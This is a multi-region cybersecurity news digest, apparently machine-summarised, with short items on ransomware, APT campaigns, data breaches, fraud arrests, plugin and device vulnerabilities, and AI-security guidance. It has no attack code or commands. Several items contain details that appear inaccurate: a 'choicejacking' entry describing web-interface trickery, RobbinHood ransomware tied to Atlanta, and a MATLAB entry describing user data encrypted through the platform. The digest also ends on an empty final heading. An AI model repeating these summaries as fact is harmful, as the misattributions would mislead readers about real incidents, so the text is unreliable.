Summary of the Incident Report
Ransomware, phishing, and nation-state cyber operations dominated headlines globally. Sri Lanka's Pensions Department was hit by ransomware, though no data loss occurred. In India, APT36 intensified attacks on critical infrastructure, while authorities busted a ₹840 crore sextortion scam in Gurgaon and seized 7,000 fake SIMs in Assam. China-linked and Pakistan-linked APTs targeted Czech and Indian systems respectively. Across Africa, Microsoft launched a cybersecurity initiative, and Ghana arrested foreign nationals for cyber fraud. Iranian group Cyber Toufan employed custom backdoors for espionage. In Australia, legal professionals' banking data was leaked due to a third-party breach. The UK faced multiple data breaches, including NHS trusts and Legal Aid. The U.S. issued new AI data security guidelines and witnessed attacks on ScreenConnect and MATLAB. Mobile malware and cookie theft dominated Latin America, with damages in billions. Bangladesh enforced new cyber laws, and Indonesia emphasized cyber defense policy. Globally, cybercrime sophistication and frequency are rising rapidly.
Asia & ASEAN
Pensions Department Hit by Ransomware Attack; No Data Loss Reported
Sri Lanka's Department of Pensions fell victim to a ransomware attack, disrupting its internal systems temporarily. Despite the attack, officials confirmed that no data was lost, and the department's primary operations have resumed. Authorities suspect that threat actors attempted to encrypt internal data but were unsuccessful, thanks to timely containment measures. The department emphasized that its data backups remained intact, mitigating the potential impact. Investigations are ongoing to determine the attack's origin and scope. The incident highlights vulnerabilities in public sector cybersecurity and has triggered a nationwide review of digital defense protocols. Officials reassured pensioners that their payments and personal data are secure. As ransomware attacks continue to rise globally, experts urge public agencies to enhance cyber resilience by adopting regular security audits, employee awareness training, and stronger network segmentation. The incident serves as a wake-up call for other Sri Lankan institutions that may lack adequate preparedness against such cyber threats.
Minister Urges Stronger Cybersecurity for National Defense
Indonesia's Coordinating Minister for Political, Legal, and Security Affairs, Hadi Tjahjanto, has called for robust cybersecurity measures to protect the country's defense and critical infrastructure. Amid increasing global cyber threats, the minister stressed the urgency of strengthening cybersecurity policies and systems. He emphasized the need for improved collaboration between government agencies, military, law enforcement, and the private sector to build a unified defense against cyberattacks. The call to action follows recent incidents highlighting vulnerabilities in national systems and underscores Indonesia's aim to elevate its cyber readiness. Tjahjanto also underlined the importance of public awareness and digital literacy to prevent exploitation by malicious actors. The government plans to bolster cyber regulations and promote investment in cybersecurity technology and skilled personnel. This initiative forms part of Indonesia's broader strategy to safeguard its sovereignty in the digital era, especially as geopolitical tensions increasingly translate into cyber operations targeting national defense mechanisms.
Earth LAMIA Hackers Exploit Vulnerabilities
A sophisticated threat group known as Earth LAMIA is actively exploiting known and unknown vulnerabilities in public-facing services and internet-exposed appliances. The campaign, targeting organizations across Asia, Latin America, and the Middle East, uses a custom malware toolkit for espionage purposes. Attackers gain initial access via vulnerable servers before deploying multiple backdoors and evasion techniques to maintain persistence and exfiltrate sensitive data. The group shows advanced operational capabilities, using encrypted communication and lateral movement within compromised networks. Researchers believe Earth LAMIA is a state-sponsored actor due to its focus on long-term surveillance and geopolitical targets. Victims span government entities, telecommunications, and defense contractors. The campaign's success is attributed to poor patch management and misconfigured systems. Security experts advise organizations to prioritize patching internet-facing assets, implement network segmentation, and monitor for signs of compromise. This operation exemplifies the increasing complexity of cyber-espionage and the pressing need for proactive defense strategies in critical sectors.
APT36 SideCopy Hackers Attack India's Critical Infrastructure
The pro-Pakistan cyber espionage group APT36, also known as SideCopy, has intensified its campaigns targeting India's critical infrastructure sectors. Utilizing advanced spear-phishing tactics, the attackers distribute malicious payloads disguised as government or defense-related documents. Once inside, they deploy custom Remote Access Trojans (RATs) that allow full control of infected systems. The group primarily targets defense personnel, research institutions, and power utilities, aiming to exfiltrate sensitive strategic data. Security researchers note that APT36's tactics have become increasingly sophisticated, with payloads capable of evading traditional antivirus solutions. Their infrastructure suggests a well-resourced operation possibly backed by a state entity. The campaign highlights growing regional cyber tensions and the strategic targeting of vital national sectors. Indian cybersecurity agencies are on high alert and urge organizations to adopt multi-layered security frameworks. This includes user awareness programs, zero-trust architectures, and rigorous endpoint monitoring to counteract the persistent and evolving threat posed by SideCopy.
251 Malicious IPs Attacking Cloud-Based Devices
Cybersecurity researchers have identified 251 unique malicious IP addresses actively targeting cloud-based devices across various sectors. The ongoing campaign leverages automated tools to scan and exploit vulnerable instances of services like SSH, RDP, and web applications. These IPs are involved in credential brute-forcing, exploitation of known vulnerabilities, and deployment of malware aimed at cryptojacking or establishing remote access. The attackers appear to be part of several botnets operating from different global regions, often using compromised systems as launch points. Enterprises running inadequately secured cloud deployments are especially vulnerable, particularly small to mid-sized businesses without dedicated IT security teams. The report urges organizations to implement security best practices, including enforcing strong authentication, disabling unused services, and conducting regular vulnerability assessments. As cloud adoption surges, threat actors are increasingly focusing on these platforms due to their accessibility and misconfiguration risks. The discovery underscores the need for continuous monitoring and proactive threat mitigation strategies.
Silver RAT Malware With New Anti-Virus Bypass Techniques
A new variant of the Silver RAT malware has emerged, showcasing advanced antivirus evasion tactics to enhance persistence and stealth. This version is equipped with polymorphic capabilities, allowing it to modify its code structure dynamically, thereby bypassing signature-based detection. Silver RAT facilitates full remote access, enabling attackers to execute commands, steal credentials, capture keystrokes, and exfiltrate files from infected systems. Distributed via phishing emails and cracked software downloads, the malware has been observed targeting both corporate and individual users. Its obfuscation techniques include encrypted payload delivery, sandbox evasion, and runtime unpacking. Security experts warn that this evolution in malware sophistication poses a significant challenge for traditional endpoint protection solutions. They recommend employing behavior-based detection mechanisms, user privilege restrictions, and frequent system audits to counter such threats. The rise of Silver RAT exemplifies the ongoing arms race between malware developers and security vendors and calls for constant innovation in defense technologies.
Velvet Chollima APT Hackers Attacking Government Officials
The North Korean-linked APT group Velvet Chollima is conducting targeted cyberattacks against high-ranking government officials across Asia and Europe. These campaigns involve spear-phishing emails laden with malicious attachments that deliver stealthy malware capable of espionage and system manipulation. The malware tools include custom Remote Access Trojans (RATs) and data exfiltration frameworks designed for stealth and persistence. Velvet Chollima's focus appears to be intelligence gathering, particularly related to diplomatic, military, and economic activities. The group employs sophisticated social engineering tactics to gain the trust of their targets, often impersonating journalists, researchers, or officials. Cybersecurity experts believe the campaign is part of North Korea's broader cyber strategy to overcome economic sanctions and gain geopolitical leverage. The attacks demonstrate a high level of technical expertise and operational discipline. Authorities urge increased vigilance and investment in threat detection systems, especially in government and diplomatic sectors vulnerable to state-sponsored cyber espionage activities.
Massive Cyberattacks Highlight the Need for Countries to Increase Investment in Digital Security
A wave of massive cyberattacks targeting public and private sectors has reignited discussions on the need for greater investment in digital security infrastructure worldwide. These attacks, which have disrupted transportation systems, healthcare services, and critical utilities, reveal serious shortcomings in national cyber resilience. Experts attribute the surge in attacks to the increasing reliance on digital systems and the lag in updating outdated cybersecurity policies. Many affected countries lack sufficient funding, skilled personnel, and coordination between public agencies and private firms. The article underscores the urgent requirement for a strategic cybersecurity roadmap that includes workforce training, public awareness, and stricter regulatory standards. As cyber warfare becomes an extension of geopolitical conflict, governments are called to treat digital infrastructure as essential to national security. The incidents highlight a global consensus: cyber preparedness must match the scale of digital transformation, and investments in digital defenses are no longer optional but imperative for stability.
Korea Needs to Do More to Prevent Repeat of KT's Network Outage: Minister
In response to a recent major network outage at KT Corporation, South Korea's Minister of Science and ICT emphasized the urgent need for enhanced cybersecurity and infrastructure resilience. The outage disrupted internet services, financial transactions, and emergency communications, raising serious concerns about the robustness of national telecom infrastructure. The Minister criticized the company's lack of preparedness and called for stricter regulatory oversight and mandatory cybersecurity audits for telecom providers. A comprehensive investigation revealed vulnerabilities in KT's internal systems and inadequate incident response protocols. The incident has spurred discussions on setting up national guidelines for handling cyber incidents and outages. Experts advocate for the establishment of a centralized command center for real-time monitoring and response coordination. The government plans to work closely with private ISPs to reinforce system redundancies and improve recovery strategies. This incident serves as a case study in how digital infrastructure failures can severely impact a nation's economy and security.
Bangladesh Launches National Online Gambling Enforcement Under New Cyber Law
The Bangladeshi government has launched a nationwide crackdown on online gambling operations under its newly enacted Cyber Security Act. This move aims to curb the rise of illegal gambling platforms that have proliferated across social media and encrypted messaging apps. Authorities are leveraging advanced digital forensics, financial transaction tracking, and IP monitoring to identify and prosecute offenders. The new legislation empowers law enforcement with greater authority to block websites, seize assets, and arrest operators. Officials stress that online gambling poses significant risks to national financial security and social well-being, as many platforms are tied to money laundering and organized crime. The campaign is also part of a broader initiative to clean up cyberspace, promote lawful digital activities, and protect vulnerable citizens from digital exploitation. As implementation proceeds, the government is engaging with telecom operators and fintech firms to ensure compliance. The enforcement marks a significant step toward establishing comprehensive digital governance in Bangladesh.
Phishing Plot Busted: 7,000 Fake SIMs, 265 Arrests in Morigaon Raid Spree
In a large-scale operation in Morigaon, Assam, Indian authorities dismantled a massive phishing network involving over 7,000 fake SIM cards and arrested 265 individuals. The suspects used these SIMs to carry out fraudulent activities, including banking scams, identity theft, and illegal online transactions. The operation, led by local police and supported by cybercrime units, uncovered a sophisticated racket involving SIM card cloning, document forgery, and the use of mule accounts. The scale and coordination of the criminal network suggest possible links to inter-state or even international syndicates. Law enforcement agencies are now analyzing seized devices and data to trace higher-level operators. This crackdown highlights the growing abuse of digital identity infrastructure and calls for stricter KYC compliance and telecom sector regulation. Authorities have pledged continued efforts to combat cyber fraud, and the public is urged to remain vigilant about digital communications and suspicious financial activities in their accounts.
Chinese and Malaysian Nationals Arrested Over Suspected Cyber Crime Activities in Weija
Ghanaian security forces have arrested several Chinese and Malaysian nationals in Weija over their alleged involvement in cybercrime activities. The suspects were caught during a coordinated operation based on intelligence regarding online fraud schemes originating from a private residence. Authorities seized dozens of electronic devices, SIM cards, and laptops believed to be used for phishing, identity theft, and illegal financial transfers. Preliminary investigations suggest the group was part of a larger transnational cybercrime syndicate targeting victims across Africa and Asia. The arrests underscore the increasing international dimension of cybercrime and the need for cross-border collaboration in cyber law enforcement. Ghanaian officials have reiterated their commitment to strengthening cybersecurity frameworks and cracking down on digital crimes. The incident has raised awareness about foreign criminal infiltration and the use of local infrastructure for global scams. It also highlights the growing relevance of cyber vigilance as a component of national security and economic protection.
Pacific & The Oceania
Fortinet Rolls Out Free Cybersecurity Curriculum in Australian Schools
Fortinet has introduced a free cybersecurity curriculum for Australian schools, aiming to address the critical skills gap in the nation's cybersecurity workforce. Delivered through the Fortinet Training Institute, the program targets high school students and integrates cybersecurity education into the general curriculum. It includes modules on foundational cyber principles, digital ethics, threat identification, and cyber hygiene. The initiative aligns with Australia's broader push to build cyber resilience from the ground up by developing early awareness and capabilities. Fortinet partners with local education authorities to ensure the material meets national standards and is accessible to all regions, including underserved communities. The program is designed to inspire future careers in cybersecurity and bolster national defense by cultivating a generation of digitally savvy individuals. This proactive educational strategy comes amid rising cyber threats and the global shortage of skilled cybersecurity professionals, reinforcing the importance of early engagement in technology-focused learning pathways.
Threat Actors Using Aggressive New Extortion Tactics: Report
A recent cybersecurity report reveals that cybercriminals are adopting increasingly aggressive extortion tactics, particularly in ransomware operations. Threat actors are now employing "double" and "triple" extortion methods — stealing data before encryption and threatening to leak it or launch DDoS attacks if victims don't pay. These tactics amplify pressure on organizations, especially in sectors like healthcare, education, and critical infrastructure, where public exposure can have devastating consequences. The report also notes the rise of "harassmentware," where attackers directly contact executives, customers, or partners to force payment. Criminal groups are becoming more organized and business-like, using negotiation teams and dedicated data leak sites. These developments underscore the shift in ransomware from simple encryption to comprehensive data exploitation strategies. Experts urge companies to enhance incident response capabilities, conduct regular backups, and invest in cyber insurance. The findings highlight a disturbing evolution in cybercrime — one that requires more than just technical defenses but also legal and strategic readiness.
Bank Details of Lawyers, Judges at Risk in Cyberattack
A major cyberattack on a third-party provider has exposed the sensitive banking information of Australian lawyers, judges, and legal professionals. The breach affected the Law Practice Board of Western Australia, which manages professional records for the legal sector. Hackers reportedly accessed documents containing bank account details, addresses, and identification data of hundreds of legal practitioners. The incident has sparked concerns about the vulnerability of regulatory bodies and their third-party vendors. Investigations are ongoing, with cybersecurity agencies and law enforcement working to assess the full extent of the damage. Legal institutions across the country have been alerted to the potential risk, and affected individuals are being urged to monitor their accounts and credit reports for signs of fraud. The breach underscores the importance of supply chain security and the need for robust cyber governance among entities handling professional and financial data. It also renews calls for mandatory breach disclosures and risk audits in the legal sector.
WA's Legal Practice Board Hack Sees Bank Details of Legal Firms Stolen as Police Investigate Cyber Incident
Western Australia's Legal Practice Board has confirmed that a cyber incident has led to the theft of bank account details from numerous legal firms, prompting a police investigation. The breach is believed to have originated from a compromised third-party provider's system, which stored financial and personal data related to legal practitioners and firms. Affected parties include small and medium-sized legal operations across WA, raising fears about potential fraud and financial loss. The board has begun notifying impacted firms while urging all stakeholders to implement precautionary cybersecurity measures. Authorities have not yet disclosed the identity of the threat actors, but early assessments suggest the attack was financially motivated. The incident has triggered calls for stronger digital oversight in the legal industry, particularly around third-party data management. As investigations continue, the case serves as a reminder of the cascading risks associated with vendor vulnerabilities and the need for comprehensive cybersecurity practices in professional services.
Europe & UK
NHS Trusts Impacted by Cyberattack with Patient Data Stolen
Multiple NHS trusts in the UK have been impacted by a recent cyberattack resulting in the theft of sensitive patient data. The breach, reportedly linked to a third-party service provider, has raised serious concerns about data security across the healthcare sector. While the National Health Service confirmed that its core systems remain operational, the compromised data may include confidential medical records, patient correspondence, and internal documents. The attackers have not yet been officially identified, but experts suspect a financially motivated ransomware group. Authorities are currently investigating the breach and working to assess the scope of the stolen data. The Information Commissioner's Office and National Cyber Security Centre have been alerted and are coordinating the response. This incident has reignited calls for healthcare organizations to enhance cybersecurity measures, particularly in their vendor management practices. Patients have been advised to remain vigilant for identity theft or fraud attempts as investigations continue.
Czech Republic Attributes Cyberattacks to China-Linked APT Group
The Czech Republic has officially attributed a series of cyberattacks on government and defense institutions to a China-linked Advanced Persistent Threat (APT) group. According to the Czech intelligence and cybersecurity agencies, the group exploited vulnerabilities in Microsoft Exchange servers to gain access and conduct espionage operations. The campaign, which began in 2023, involved long-term infiltration and data exfiltration activities aimed at gathering sensitive political and defense-related information. Czech authorities stated that the attacks were coordinated and persistent, suggesting state-sponsored origins. This marks one of the strongest public attributions by a European nation toward Chinese threat actors. In response, the Czech government is strengthening its cyber defense posture, engaging international allies, and calling for collective action within the EU and NATO. The Chinese embassy in Prague has denied the allegations, while security experts underscore the importance of robust detection systems and international cooperation to combat such high-level cyber threats.
Ransomware Gang Claims Mediclinic Cyberattack, Threatens Data Leak
A ransomware group known as "INC Ransom" has claimed responsibility for a cyberattack on Mediclinic, one of the largest private hospital groups operating in South Africa and other regions. The attackers allegedly exfiltrated a significant volume of sensitive data, including patient records and internal documents, and are threatening to leak the stolen information unless a ransom is paid. Mediclinic has acknowledged the incident and stated that its operations remain largely unaffected, though investigations are ongoing. The group behind the attack has published evidence of the breach on their dark web site, escalating pressure on the healthcare provider. Cybersecurity experts warn that such attacks against healthcare organizations are becoming increasingly common, given the high value of medical data and the urgency associated with patient care. Authorities are working to contain the breach and assess its impact while urging healthcare institutions to invest in modern cybersecurity frameworks and ransomware mitigation strategies.
Regulatory Compliance Emerging as a Critical Driver of Cybersecurity Strategies
As cyber threats continue to evolve, regulatory compliance has become a crucial factor shaping cybersecurity strategies for organizations worldwide. Businesses are now compelled to align their security frameworks with regional and industry-specific regulations such as GDPR, HIPAA, PCI-DSS, and others to avoid hefty fines and reputational damage. Experts highlight that compliance requirements increasingly influence decisions on data encryption, access control, incident response, and risk assessments. Cybersecurity professionals are leveraging compliance audits not just as checklists but as opportunities to identify and close security gaps. However, the complexity and diversity of global regulations pose challenges for multinational organizations, especially in managing cross-border data flows. A growing trend involves integrating regulatory requirements into automated security workflows to streamline governance and ensure real-time compliance. The report concludes that organizations treating compliance as a proactive risk management tool, rather than a legal obligation, are better positioned to defend against cyber threats and build stakeholder trust.
Choicejacking Attacks Exploit UI Design to Manipulate User Behavior
A newly discovered cyberattack method known as "choicejacking" is gaining attention for its ability to manipulate users into making unintended selections by exploiting user interface (UI) design flaws. This social engineering tactic involves altering the visual presentation of options on a webpage — such as buttons, checkboxes, or dropdowns — so users are tricked into clicking or selecting something different from what they intended. Common in phishing campaigns, choicejacking enables threat actors to bypass user intent and gain unauthorized permissions, redirect users to malicious sites, or trigger downloads of malware. Security researchers warn that this technique is particularly dangerous because it relies on psychological manipulation rather than technical exploits, making it harder to detect. Developers are urged to conduct thorough UI audits, use standardized interface components, and implement browser-level protections to mitigate such risks. As attackers increasingly blend social engineering with technical precision, awareness and secure design principles are key to preventing choicejacking.
Sandbox Analysis Significantly Enhances Three Key SOC Metrics
Security Operations Centers (SOCs) are reporting marked improvements in performance metrics following the integration of sandbox analysis into their threat detection and response workflows. According to a recent study, sandboxing technologies — used to safely detonate and analyze suspicious files — have helped SOCs enhance mean time to detect (MTTD), mean time to respond (MTTR), and threat detection accuracy. Analysts note that real-time behavior analysis within sandbox environments allows for deeper insights into malware characteristics, enabling faster and more confident decisions. This reduces false positives and accelerates the response process. Additionally, automated sandbox integration with SIEM and SOAR tools has streamlined the investigative workflow, freeing up analysts for higher-level threat hunting. Organizations adopting sandbox analysis also report better threat attribution and incident documentation. Experts recommend sandboxing as a critical component of modern cybersecurity infrastructure, particularly for environments dealing with high volumes of unknown or complex threats.
Hackers Mimic Popular Antivirus Sites to Distribute Malware
Cybercriminals are creating spoofed versions of popular antivirus software websites to distribute malware disguised as legitimate security tools. These fake sites closely replicate the design, branding, and even domain structures of genuine antivirus vendors to deceive users into downloading malicious installers. Once executed, the malware — often information stealers or remote access trojans — compromises the victim's device and exfiltrates sensitive data. In some cases, attackers also use search engine optimization (SEO) poisoning to promote these fraudulent sites in search results, increasing the likelihood of user interaction. The tactic exploits the trust users place in well-known cybersecurity brands, making it particularly effective. Security experts advise users to verify URLs, avoid clicking on ads or suspicious links in search engines, and download software only from official vendor websites. Organizations are encouraged to educate employees about this rising threat and implement web filtering tools to prevent access to malicious domains mimicking trusted security providers.
Craft CMS Vulnerability Exploited by Hackers to Inject Malicious Code
A critical vulnerability in Craft CMS is being actively exploited by hackers to inject malicious code into vulnerable websites. The flaw, which affects specific versions of the content management system, allows remote attackers to execute arbitrary PHP code via poorly sanitized input fields. Once exploited, attackers can gain persistent access, modify site content, or redirect users to phishing pages. Security researchers note that the exploit is relatively easy to execute, making it a prime target for automated attack tools. Craft CMS has released a patch addressing the issue, and administrators are urged to update their installations immediately. Unpatched instances remain at risk of compromise, particularly those with exposed administrative panels. Website operators are also encouraged to conduct code audits, monitor logs for unusual behavior, and enforce strong input validation practices. This incident highlights the importance of timely patching and security hardening in widely used content management systems.
XenServer VM Tools Windows Vulnerability Exposes Systems to Elevation of Privilege
A vulnerability has been discovered in XenServer's VM Tools for Windows, allowing attackers to exploit the flaw for privilege escalation on guest virtual machines. Tracked under a unique CVE identifier, the flaw stems from improper handling of file permissions during the VM Tools installation process. Malicious actors with low-level access could leverage the vulnerability to execute arbitrary code with elevated privileges within the guest environment, potentially compromising the broader virtual infrastructure. The issue poses significant risks in multi-tenant environments such as cloud or shared-hosting platforms. Citrix, which maintains XenServer, has issued a security advisory and released updated versions of the software to mitigate the threat. Security experts recommend immediate patching and urge administrators to limit guest access to sensitive VM tools and monitor for indicators of misuse. The disclosure underscores the critical need for hypervisor-level security and routine assessments of third-party tools used in virtualized environments.
UK Legal Aid Data Breach Exposes Millions of Sensitive Records
A significant data breach affecting the UK's Legal Aid Agency has resulted in the exposure of millions of confidential records, sparking public outcry and scrutiny of the Ministry of Justice's cybersecurity practices. The breach, reportedly caused by inadequate access controls and outdated systems, exposed sensitive information including legal case files, financial data, and personal identifiers of clients and legal professionals. Critics have slammed the government's failure to modernize its cybersecurity infrastructure despite previous warnings and audits. While the agency has launched an internal investigation and is cooperating with the Information Commissioner's Office, there is growing concern over potential identity theft and misuse of legal information. Cybersecurity experts emphasize the urgency of implementing zero-trust frameworks and regular security audits in public sector institutions. The incident also raises broader questions about data governance and accountability in government-managed systems that handle sensitive public data.
Hackers Exploit SimpleHelp RMM Tool to Deploy Malware
Cybercriminals are actively exploiting a vulnerability in the SimpleHelp Remote Monitoring and Management (RMM) tool to deploy malware on enterprise systems. According to cybersecurity researchers, attackers are using the tool's remote access capabilities to install backdoors, execute scripts, and exfiltrate data undetected. The exploitation typically begins with phishing campaigns or brute-force attacks to gain administrative access, after which the compromised RMM instance is used as a launchpad for lateral movement and malware deployment across the network. Because RMM tools have high privileges and network-wide visibility, they are prime targets for threat actors seeking maximum impact. Experts warn that misuse of such legitimate software tools is difficult to detect without behavior-based monitoring. Organizations are advised to update SimpleHelp to the latest version, enforce strong access controls, and continuously monitor RMM activity for anomalies. This incident is part of a larger trend where attackers weaponize IT management tools to bypass traditional defenses.
Threat Actors Impersonate DocuSign in Phishing Campaign to Steal Credentials
A new phishing campaign is targeting users by impersonating DocuSign, the widely used electronic signature platform, in an attempt to steal login credentials and sensitive documents. The attackers send fake email notifications claiming a document needs immediate signing, with a link that leads to a counterfeit login page. Unsuspecting users who enter their credentials unknowingly hand over access to threat actors, who then use the information for identity theft or further intrusions into corporate systems. Security researchers warn that this campaign is well-crafted, using accurate branding and legitimate-sounding domains to enhance its credibility. Businesses that frequently use DocuSign are at higher risk, especially if employees are not trained to spot phishing attempts. Experts advise enabling multi-factor authentication (MFA), verifying sender domains, and educating staff about common phishing red flags. As impersonation-based attacks become more refined, robust email filtering and user vigilance are critical for preventing credential theft.
MathWorks Confirms Ransomware Attack; Adidas, Dutch Intelligence Also Impacted by Cyber Incidents
MathWorks, the developer of MATLAB and Simulink, has confirmed a ransomware attack that temporarily disrupted its operations. The company stated that it is working with cybersecurity experts to investigate the breach and has taken measures to restore affected systems. Concurrently, Adidas faced a data breach impacting customer information, although details remain limited. Meanwhile, Dutch intelligence agencies have issued a warning about an increased likelihood of state-sponsored cyberattacks targeting critical infrastructure, particularly from Russia and China. These events highlight a surge in cyber incidents affecting both corporate and government sectors. Experts attribute the rise to escalating geopolitical tensions and an expanding threat landscape involving ransomware, data theft, and espionage. Organizations are urged to bolster their cyber defenses, conduct frequent risk assessments, and adopt advanced detection systems. The incidents reflect a broader trend of highly coordinated cyberattacks aimed at disrupting operations, stealing intellectual property, and undermining public trust in digital systems.
USA & Canada
Nova Scotia Power Warns of Scammers Exploiting Cyberattack Confusion
Following a cyberattack on its IT systems, Nova Scotia Power is cautioning customers about a surge in scam attempts. The utility company, part of Emera Inc., confirmed that while the attack did not affect electricity supply or customer data, threat actors are capitalizing on public concern by impersonating company officials. Scammers are reportedly contacting customers via phone, email, and social media, demanding payments or requesting sensitive information under false pretenses. Nova Scotia Power has emphasized it will never ask for personal or banking details through unsolicited communication. The province's privacy commissioner and local law enforcement have been alerted, and investigations are ongoing. While IT systems are gradually being restored, the incident has raised broader concerns about cyber resilience and the exploitation of crisis situations by fraudsters. Authorities are urging the public to remain vigilant, verify communications, and report any suspicious activity, underlining how cyberattacks can trigger widespread secondary fraud risks.
ConnectWise Confirms ScreenConnect Cyberattack, Claims Systems Now Secure
ConnectWise has officially confirmed that its remote access software ScreenConnect was compromised in a cyberattack, but reassures users that systems are now secure. The company states that it identified suspicious activity and acted swiftly to mitigate risks, patch vulnerabilities, and strengthen defenses. Although ConnectWise has not disclosed the full scope or the attacker's identity, sources suggest that the exploit may have been used for unauthorized remote access. ScreenConnect is widely used by managed service providers (MSPs), raising alarms about potential cascading impacts on end clients. Cybersecurity experts are closely monitoring for signs of follow-on attacks, particularly data theft or malware deployment. ConnectWise has initiated a comprehensive security review and is urging partners to update their systems and adopt additional security practices. The incident adds to a growing list of supply chain and software-based cyber threats, emphasizing the need for constant vigilance and rapid incident response across tech service platforms.
Matlab Targeted in Ransomware Attack, Disrupting Data Access and Operations
A ransomware attack has targeted MathWorks' MATLAB, a widely used software platform for engineering and data science, disrupting operations and locking access to critical files. The attack involved encrypting user data and demanding ransom payments for decryption. The company has acknowledged the breach but has not confirmed the extent of damage or whether any ransom will be paid. Academic institutions and engineering firms that rely heavily on MATLAB for simulation and analysis work have reported temporary work stoppages due to inaccessible files. The attackers allegedly exploited a known vulnerability in the platform's integration components. Security analysts warn this attack may signal a shift in ransomware targeting strategies — focusing on niche, high-dependency software used in research and industry. The incident underscores the need for frequent patching and secure software practices in technical environments. Organizations are now urged to reassess the cybersecurity posture of their critical toolsets and ensure adequate backup protocols.
Cyberattack Surge Spurs Insurance Rethink and Premium Hike Discussions
A surge in cyberattacks across multiple sectors is creating opportunities for insurers while prompting a reassessment of how cyber risk is priced and covered. The rise in ransomware, data breaches, and supply chain attacks has led to increased claims, challenging traditional underwriting models. Insurers are now introducing more restrictive policies, raising premiums, and implementing stricter conditions such as mandatory multi-factor authentication and third-party risk audits. At the same time, the insurance industry sees growth potential in developing more tailored cyber products and services for small to mid-sized enterprises, which are increasingly targeted by threat actors. Some providers are also exploring cyber risk-sharing partnerships with governments or using advanced data analytics to model threat scenarios more effectively. As cyber threats continue to evolve, businesses are being urged to view insurance as part of a broader risk management strategy — one that includes technical defenses, staff training, incident response planning, and regulatory compliance readiness.
WordPress TI WooCommerce Wishlist Plugin Found Vulnerable to Exploitation
A critical vulnerability has been discovered in the popular TI WooCommerce Wishlist plugin for WordPress, affecting over 100,000 active installations. The flaw, identified as an unauthenticated stored cross-site scripting (XSS) vulnerability, allows attackers to inject malicious scripts that can compromise site visitors and administrators. The vulnerability stems from improper sanitization of user input, enabling threat actors to exploit the plugin through specially crafted URLs or comments. This could lead to session hijacking, credential theft, or the deployment of malware. Security researchers have notified the developers, who have since released an urgent patch. Site administrators are being strongly advised to update the plugin immediately and conduct security scans for potential infections. The incident serves as a reminder of the risks posed by third-party plugins in content management systems and highlights the importance of regular plugin audits, software updates, and the use of security monitoring tools in maintaining WordPress website integrity.
CISA, NSA, FBI Release Joint Guidelines on Securing AI and Sensitive Data
The U.S. Cybersecurity and Infrastructure Security Agency (CISA), along with the NSA and FBI, has issued new guidelines focused on safeguarding AI systems and the sensitive data they process. The joint advisory outlines risks related to data poisoning, model theft, adversarial inputs, and abuse of generative AI tools by threat actors. These concerns are especially critical for defense, healthcare, and critical infrastructure sectors integrating AI into operational frameworks. The guidance emphasizes the need for secure model training environments, robust data validation, access controls, and continuous monitoring to detect anomalies in AI behavior. It also warns against over-reliance on black-box AI solutions without transparency or auditability. Organizations are encouraged to adopt a zero-trust architecture and implement AI-specific threat modeling practices. The release of these guidelines marks a significant step in formalizing AI security as a core aspect of national cyber defense, urging both public and private sectors to act proactively.
FormBook Malware Campaign Targets Windows Users with Phishing and Info-Stealing
A new wave of FormBook malware attacks is actively targeting Windows users via phishing campaigns designed to steal sensitive information such as credentials, screenshots, and keystrokes. The malware is being delivered through malicious email attachments disguised as business documents, invoices, or shipping notices. Once executed, it establishes persistence on the host machine and begins exfiltrating data to remote command-and-control servers. The current campaign features enhanced obfuscation techniques to evade traditional antivirus software, making detection more difficult. Cybersecurity analysts have identified a sharp increase in attacks originating from known threat actor clusters leveraging compromised email accounts. Organizations are advised to train employees on phishing identification, deploy endpoint detection and response (EDR) solutions, and monitor network traffic for anomalies. The FormBook malware remains a persistent threat due to its low cost, wide availability on underground forums, and effectiveness against poorly secured systems, particularly in small and medium-sized enterprises with limited cybersecurity budgets.
CISA Flags Critical Vulnerability in Johnson Controls iSTAR Controllers
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued a security advisory warning about a critical vulnerability in Johnson Controls' iSTAR Ultra access control devices, used widely in government and commercial buildings. The vulnerability, tracked as CVE-2024–23192, could allow remote attackers to gain full control of affected devices by sending specially crafted requests. This poses a significant risk to physical security systems and facility infrastructure. Exploitation of this flaw could lead to unauthorized access, data theft, or operational disruption. CISA is urging all affected entities to update to the latest firmware versions immediately and to segment network access for these devices. Johnson Controls has issued a patch and is coordinating with federal agencies to ensure secure deployment. This vulnerability underscores the growing convergence of IT and OT threats, especially in building automation and physical access technologies, where cyber incidents could have real-world safety and security consequences.
Hackers Allegedly Claim AT&T Data Leak Involving 70 Million Customers
Hackers are allegedly claiming responsibility for a significant data leak involving AT&T customer information, including details from up to 70 million accounts. The breach was reportedly posted on underground forums, with samples showing names, phone numbers, addresses, and Social Security numbers. AT&T has not officially confirmed the breach but has initiated an internal investigation and involved third-party forensic experts to verify the authenticity of the claims. The company previously denied similar data exposure incidents, but the recurrence of such leaks has cast doubts on its security assurances. Cybersecurity experts warn that if validated, the leak could have massive implications for consumer privacy and potential fraud, such as identity theft and phishing attacks. Affected users are advised to monitor their credit reports, enable account alerts, and avoid unsolicited communications. The incident highlights ongoing concerns about telecom data security and the long-term risks of storing massive customer datasets without robust protections.
RobbinHood Ransomware Operator Charged for High-Profile Attacks on U.S. Cities
U.S. authorities have formally charged a key operator behind the RobbinHood ransomware, linked to several high-profile attacks on municipal systems, including those in Baltimore and Atlanta. The Department of Justice alleges that the accused developed and deployed ransomware to encrypt critical government infrastructure, demanding substantial ransoms in cryptocurrency. The attacks disrupted public services such as emergency response, tax systems, and city operations, resulting in millions of dollars in recovery costs. Law enforcement traced the perpetrator using cryptocurrency transaction trails, digital infrastructure logs, and international cooperation. The indictment is seen as a significant milestone in holding ransomware developers accountable and may serve as a deterrent to other cybercriminals. However, cybersecurity professionals stress that while one arrest is a victory, broader systemic challenges in ransomware prevention and resilience remain. The case underscores the importance of investment in municipal cyber defense and the necessity of coordinated responses across law enforcement and cybersecurity agencies.
Africa And The MiddleEast
Iranian Cyber Toufan Hackers Target Global Organizations Using Custom Backdoors
